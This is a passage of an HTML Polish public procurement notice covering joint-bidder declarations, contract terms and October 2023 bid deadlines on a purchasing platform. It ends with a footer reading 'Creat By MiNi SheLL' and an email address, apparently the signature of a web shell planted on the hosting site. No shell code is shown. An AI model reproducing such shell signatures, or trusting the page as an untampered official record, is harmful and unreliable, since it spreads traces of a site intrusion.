wspólna powinna być sporządzona zgodnie z SWZ. <br/>4.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VI pkt 1,4 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wskazuje spełnianie warunków udziału w postępowaniu. <br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowalne/usługi/dostawy wykonują poszczególny Wykonawcy. <br/>6.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Zakupowa Open Nexus</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-12 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-11-12</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wszelkie Dokumenty oraz zapytania należy składać wyłącznie poprzez Platformę Zakupową OpenNexus

Creat By MiNi SheLL
Email: jattceo@gmail.com